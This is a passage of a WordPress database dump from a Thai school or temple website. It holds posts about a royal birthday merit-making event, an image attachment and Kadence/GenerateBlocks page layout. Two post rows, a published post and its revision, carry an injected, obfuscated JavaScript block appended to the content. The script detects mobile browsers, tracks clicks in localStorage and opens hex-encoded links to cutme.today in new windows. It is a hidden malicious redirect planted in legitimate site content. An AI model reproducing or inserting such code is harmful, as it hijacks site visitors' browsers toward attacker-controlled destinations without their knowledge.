)|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','กิจกรรมตักบาตร ปลูกต้นไม้ ปล่อยปลา เปิดถนนเฉลิมพระเกียรติ เนื่องในโอกาสมหามงคลเฉลิมพระชนมพรรษาครบ 6 รอบ ของพระบาทสมเด็จพระวชิรเกล้าเจ้าอยู่หัว 28 กรกฎาคม 2567','','publish','open','open','','%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b8%95%e0%b8%b1%e0%b8%81%e0%b8%9a%e0%b8%b2%e0%b8%95%e0%b8%a3-%e0%b8%9b%e0%b8%a5%e0%b8%b9%e0%b8%81%e0%b8%95%e0%b9%89%e0%b8%99%e0%b9%84','','','2024-07-29 18:41:51','2024-07-29 11:41:51','',0,'http://watprato.ssk.in.th/?p=88',0,'post','',0),
(89,1,'2024-07-29 18:31:46','2024-07-29 11:31:46','','bbf748f7ec95ca22cc43c88f2cbabaed96a3f710b9e0ad63d5bd93e3041f3268','','inherit','open','closed','','bbf748f7ec95ca22cc43c88f2cbabaed96a3f710b9e0ad63d5bd93e3041f3268','','','2024-07-29 18:31:46','2024-07-29 11:31:46','',88,'http://watprato.ssk.in.th/wp-content/uploads/2024/07/bbf748f7ec95ca22cc43c88f2cbabaed96a3f710b9e0ad63d5bd93e3041f3268.jpg',0,'attachment','image/jpeg',0),
(90,1,'2024-07-29 18:31:54','2024-07-29 11:31:54','<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3Dpfbid02ZsfHLA322aMxTRXbN29d39s53bBgjKX54VohYLCoaZPX5Q4VgyLgtWiakdM5rgAul%26id%3D61556083436494&show_text=true&width=500\" width=\"500\" height=\"616\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','กิจกรรมตักบาตร ปลูกต้นไม้ ปล่อยปลา เปิดถนนเฉลิมพระเกียรติ เนื่องในโอกาสมหามงคลเฉลิมพระชนมพรรษาครบ 6 รอบ ของพระบาทสมเด็จพระวชิรเกล้าเจ้าอยู่หัว 28 กรกฎาคม 2567','','inherit','closed','closed','','88-revision-v1','','','2024-07-29 18:31:54','2024-07-29 11:31:54','',88,'http://watprato.ssk.in.th/?p=90',0,'revision','',0),
(91,1,'2024-07-29 18:32:30','2024-07-29 11:32:30','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_93202e-5b\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_e4ac7a-c6\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_e4ac7a-c6\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_fdcfc1-e7\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_987966-10\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_987966-10\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_7bc053-2c\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_3a11d0-a6\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_3a11d0-a6 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_138813-93\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_138813-93\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_9f83a7-ce\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_9f83a7-ce\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_7fabbb-99\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_7fabbb-99\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_1d2215-71\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_1d2215-71\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_7e7dd7-10\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_7e7dd7-10\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" 